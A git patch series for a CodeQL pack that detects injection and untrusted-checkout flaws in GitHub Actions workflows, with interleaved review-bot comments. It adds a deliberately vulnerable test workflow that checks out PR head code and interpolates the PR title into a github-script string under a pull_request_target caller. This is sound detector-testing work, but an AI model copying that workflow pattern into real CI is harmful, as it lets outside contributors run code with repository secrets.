@@ -37,12 +35,12 @@ private predicate isExternalUserControlledPullRequest(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.pull_request\\.title\\b", "\\bgithub\\.event\\.pull_request\\.body\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.label\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.default_branch\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.description\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.homepage\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" + "github\\.event\\.pull_request\\.title", "github\\.event\\.pull_request\\.body", + "github\\.event\\.pull_request\\.head\\.label", + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.repo\\.description", + "github\\.event\\.pull_request\\.head\\.repo\\.homepage", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref" ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -51,14 +49,12 @@ private predicate isExternalUserControlledPullRequest(string context) { bindingset[context] private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context) - .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.review\\.body\\b")) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.review\\.body")) } bindingset[context] private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context) - .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.comment\\.body\\b")) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.comment\\.body")) } bindingset[context] 
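Review bot: These patterns only recognise dot-notation, but GitHub expressions also allow index syntax (`github.event.pull_request['title']`, `github['event'].pull_request.head.ref`), which a whole-string `regexpMatch` will not classify as a source unless `normalizeExpr` rewrites index access to dot form — I cannot tell from this hunk. If it does not, canonicalising `['name']` to `.name` inside `normalizeExpr` is a single change rather than a widening of every pattern here, and a fixture using the bracket form would pin the behaviour. Dropping the inner `\\b` anchors is fine only because `wrapRegexp` re-adds them; a one-line comment above the list, `// anchoring is delegated to Utils::wrapRegexp`, keeps that invariant visible for the next person adding an entry.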
@@ -66,8 +62,8 @@ private predicate isExternalUserControlledGollum(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.page_name\\b", - "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title" ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -79,16 +75,15 @@ private predicate isExternalUserControlledCommit(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.message\\b", - "\\bgithub\\.event\\.head_commit\\.message\\b", - "\\bgithub\\.event\\.head_commit\\.author\\.email\\b", - "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.head_commit\\.committer\\.email\\b", - "\\bgithub\\.event\\.head_commit\\.committer\\.name\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.email\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.name\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", + "github\\.event\\.commits\\[[0-9]+\\]\\.message", "github\\.event\\.head_commit\\.message", + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
@@ -98,7 +93,7 @@ private predicate isExternalUserControlledCommit(string context) { bindingset[context] private predicate isExternalUserControlledDiscussion(string context) { exists(string reg | - reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] + reg = ["github\\.event\\.discussion\\.title", "github\\.event\\.discussion\\.body"] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) @@ -109,15 +104,14 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.workflow\\.path\\b", - "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", - "\\bgithub\\.event\\.workflow_run\\.display_title\\b", - "\\bgithub\\.event\\.workflow_run\\.head_repository\\.description\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.message\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.email\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.email\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.display_title", + "github\\.event\\.workflow_run\\.head_repository\\.description", + "github\\.event\\.workflow_run\\.head_commit\\.message", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) From e0bbb66be47b1076532dcf1a179f1220fdf55e73 Mon Sep 17 00:00:00 2001 
From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 15:11:21 +0100 Subject: [PATCH 128/707] Try to fix `actions-all` suite --- ql/src/codeql-suites/actions-all.qls | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 2439b95a8e55..8c0f580a7ade 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -1,2 +1,5 @@ - description: Standard Code Scanning queries for Actions -- queries: . \ No newline at end of file +- queries: . +- include: + kind: + - path-problem From 09c2ba4280c91840c176bab80b056b5aca9e5246 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 16:39:18 +0100 Subject: [PATCH 129/707] Make action download `actions-all` --- .github/action/src/codeql.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 56615fa80cee..0fcdd81ee3fd 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "githubsecuritylab/actions-all", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), From e60c0b875fd69025fc695601e8981bbf4dae1b6f Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 22:01:06 +0000 Subject: [PATCH 130/707] Fix inputs for composite action --- action.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/action.yml b/action.yml index e8f13962e819..9281212ea24e 100644 --- a/action.yml +++ b/action.yml 
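Review bot: The new `include: kind: - path-problem` filter keeps only path-problem queries, so every `@kind problem` query in the pack — `Security/CWE-829/UntrustedCheckout.ql` is one, per its header later in this series — is dropped from a suite named `actions-all` and described as "Standard Code Scanning queries for Actions". If the intent is to exclude non-alert queries (e.g. the IDE-contextual ones), list both alert kinds, `kind:` / `- problem` / `- path-problem`; if path-problem only is really intended, the suite name and description should say so.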
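Review bot: `pack` now names `githubsecuritylab/actions-all`, but in this same series `ql/lib/qlpack.yml` declares that name with `library: true`, while the queries and `codeql-suites/*.qls` live in `ql/src`, published as `githubsecuritylab/actions-queries` (`library: false`). Downloading the library pack and then resolving `suite: codeql-suites/${...}.qls` against it will presumably fail to find the suite; the pack name and the suite path should refer to the same pack, e.g. keep `pack: "githubsecuritylab/actions-queries"` and fix the suite file instead. Whichever name is used, pinning the pack version (`name@x.y.z`) rather than taking the latest would stop the action from silently picking up a different query set between runs.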
@@ -26,5 +26,8 @@ runs: env: GITHUB_TOKEN: ${{ inputs.token }} GH_TOKEN: ${{ inputs.token }} + INPUT_SOURCE-ROOT: ${{ inputs.source-root }} + INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} + INPUT_SUITE: ${{ inputs.suite }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 8906bd96350661569f8a29a0790b6700b8aa85e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 11:00:22 +0100 Subject: [PATCH 131/707] Bump versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4dd2ab2866e6..7d2de60df75c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.3 +version: 0.0.4 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 90647d422407..f36c119e7202 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.3 +version: 0.0.4 groups: - actions - queries From 8023a527a40d8dff50ec949bcba3f7ef6a76567f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:02:11 +0100 Subject: [PATCH 132/707] fix(untrusted_co): Do not report Reusable workflows called from pull_request --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 24 ++++- .../.github/workflows/changelog_from_prt.yml | 100 ++++++++++++++++++ .../workflows/changelog_required_prt.yml | 9 ++ 3 files changed, 128 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 1be8a6ea0f5d..b33c7325526d 100644 
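Review bot: `INPUT_SARIF-OUTPUT` is derived from `inputs.sarif-output`, but the TypeScript side shown in the previous commit reads `core.getInput("sarif")`, which `@actions/core` resolves to `INPUT_SARIF`, so the SARIF output path still arrives empty from this composite wrapper. Either rename the input consistently (`INPUT_SARIF: ${{ inputs.sarif }}` here and in the `inputs:` block) or change the reader to `core.getInput("sarif-output")`. These manual exports are presumably needed because a composite `run:` step does not see the caller's `INPUT_*` variables; a comment above the `env:` block, e.g. `# composite steps do not inherit INPUT_*; re-export for @actions/core getInput()`, would keep a future cleanup from deleting them.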
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Workflows triggered on `pull_request_target` have read/write access to the base repository and access to secrets. + * @description Priveleged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem @@ -121,12 +121,26 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent([ - "pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", - "workflow_run", "check_run", "check_suite", "workflow_call" - ]) and + ( + // The Workflow is triggered by an event other than `pull_request` + not isSingleTriggerWorkflow(w, "pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + isSingleTriggerWorkflow(w, "workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = w.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not isSingleTriggerWorkflow(caller, "pull_request") + ) + ) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check 
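Review bot: The new `@description` misspells "Privileged" as `Priveleged`, and this text is what code-scanning alerts display, so it is worth correcting in this hunk: `* @description Privileged workflows have read/write access to the base repository and access to secrets.`. Since the query now also covers reusable workflows, a short clause naming that case (a `workflow_call` workflow reached from a privileged caller) would keep the description in step with the new `where` logic.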
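Review bot: The second disjunct of the new `where` clause is unreachable: for a workflow whose only trigger is `workflow_call`, `isSingleTriggerWorkflow(w, "pull_request")` is false, so `not isSingleTriggerWorkflow(w, "pull_request")` already holds and every reusable workflow is reported regardless of its callers — the opposite of what the commit title promises. The first disjunct should exclude both single-trigger shapes, `not isSingleTriggerWorkflow(w, ["pull_request", "workflow_call"])`, leaving the caller check to decide the `workflow_call` case. Two further gaps are worth a look: the caller check is one level deep, so a reusable workflow called only from another reusable workflow is judged by that intermediate's triggers rather than the real entry point (a recursive predicate over `ExternalJob.getCallee()` would fix it), and `not isSingleTriggerWorkflow(w, "pull_request")` also holds for `on: [push, pull_request]`, which never runs fork code with write permissions, so keeping the explicit privileged-trigger list may give fewer false positives than "anything but exactly pull_request". Minor: `count(string t | w.getATriggerEvent() = t | t) = 1` is just `strictcount(w.getATriggerEvent()) = 1`.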
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml new file mode 100644 index 000000000000..0ee850f183d7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml 
@@ -0,0 +1,100 @@ +name: changelog + +on: + workflow_call: + inputs: + create: + description: Add a log to the changelog + type: boolean + required: false + default: false + update: + description: Update the existing changelog + type: boolean + required: false + default: false + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + if: (inputs.create && failure()) || (inputs.update && success()) + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, 
insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml new file mode 100644 index 000000000000..8a3b1b02a63d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml @@ -0,0 +1,9 @@ +name: '📋' + +on: + pull_request_target: + branches: [master] + +jobs: + changelog: + uses: ./.github/workflows/changelog_from_prt.yml From 9683ae35bcee5b8a9ce3118edf08ca9039cf1044 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:04:57 +0100 Subject: [PATCH 133/707] Add tests --- ql/test/query-tests/Security/CWE-094/CodeInjection.expected | 4 ++++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 2 files changed, 8 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 14b0c535ac62..2ad850548037 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
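Review bot: This caller/callee pair does not actually exercise the new caller check in `UntrustedCheckout.ql`: as written in this commit the first `where` disjunct already reports any `workflow_call`-only workflow, so `changelog_from_prt.yml` is flagged with or without `changelog_required_prt.yml` present. Add the negative counterpart — the same reusable workflow referenced only from a workflow whose sole trigger is `pull_request` — so a regression in the caller logic shows up as a spurious alert in the expected output. A one-line header comment here, e.g. `# caller fixture: pull_request_target -> changelog_from_prt.yml, expected to be reported`, would also tie the two files together for whoever reads the test directory.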
@@ -4,6 +4,7 @@ edges | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -66,6 +67,8 @@ nodes | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -205,6 +208,7 @@ subpaths | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index bdb5ae3ea556..e818ced0c1d7 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -4,6 +4,7 @@ edges | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -66,6 +67,8 @@ nodes | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -204,6 +207,7 @@ subpaths
 #select
 | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} |
 | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} |
+| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} |
 | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user.
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} |
 | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} |
 | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} |
From 874e45e3e526b1e35415f76b60a1a828bb4eee6d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 18 Mar 2024 13:22:53 +0100
Subject: [PATCH 134/707] feat(sources): New sources
This PR also adds the ability to not limit a source to a trigger event
---
 ql/lib/ext/trilom_file-changes-action.model.yml | 11 +++++++++++
 ql/src/Security/CWE-094/PrivilegedCodeInjection.ql | 1 +
 2 files changed, 12 insertions(+)
 create mode 100644 ql/lib/ext/trilom_file-changes-action.model.yml
diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml
new file mode 100644
index 000000000000..db3d37597827
--- /dev/null
+++ b/ql/lib/ext/trilom_file-changes-action.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ # https://github.com/trilom/file-changes-action
+ # if `prNumber` is provided, the trigger event dont need to be `pull_request_target`
+ - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"]
diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
index 69ab240616e6..32f292f22003 100644
--- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
+++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
@@ -24,6 +24,7 @@ where
 w = source.getNode().asExpr().getEnclosingWorkflow() and
 (
 w instanceof ReusableWorkflow or
+ source.getNode().(RemoteFlowSource).getATriggerEvent() = "*" or
 w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
 )
 select sink.getNode(), source, sink,
From 06747cd98b7c3d48070ae06be902940f734895cc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 21 Mar 2024 14:16:11 +0100
Subject: [PATCH 135/707] Add tests for untrusted checkouts in workflow_run triggered workflows
---
